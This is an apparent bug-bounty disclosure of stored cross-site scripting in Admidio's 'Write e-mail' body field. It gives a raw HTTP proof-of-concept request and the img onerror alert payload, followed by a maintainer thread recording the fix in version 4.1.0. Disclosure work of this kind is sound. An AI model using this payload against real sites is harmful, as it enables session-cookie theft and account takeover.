Cross-site Scripting (XSS) - Stored in admidio/admidio


Reported on

Sep 28th 2021


Stored XSS in parameter 'msg_body' at 'Write e-mail' allows for the arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo/adm_program/modules/messages/messages_send.php HTTP/2
Cookie: ADMIDIO_DEMO_d00c3e23_demo_SESSION_ID=93c01fc78b67c3dd8e8ce86ae139a396; 'ADMIDIO_DEMO_d00c3e23_demo_cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23765900513111934937891624423
Content-Length: 720
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

Content-Disposition: form-data; name="msg_to[]"

groupID: 4
Content-Disposition: form-data; name="subject"

Content-Disposition: form-data; name="MAX_FILE_SIZE"

Content-Disposition: form-data; name="msg_body"

<p>&lt;iMg SrC=&quot;x&quot; oNeRRor=&quot;alert(1);&quot;&gt;</p>

Content-Disposition: form-data; name="btn_send"


Step to Reproduct

Goto News > Write e-email

At body input with payload: <iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when open detail e-mail


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the admidio team and are waiting to hear back a year ago
admidio/admidio maintainer validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
admidio/admidio maintainer
a year ago


The problem is solved within the current master. If I solve the csrf within the forms we will release version 4.1 which will adresse this issue.

a year ago


Oke. I waiting for the new version from you

Markus Faßbender marked this as fixed in 4.1.0 with commit eec453 a year ago
Markus Faßbender has been awarded the fix bounty
This vulnerability will not receive a CVE
a year ago


Thanks for the research.

to join this conversation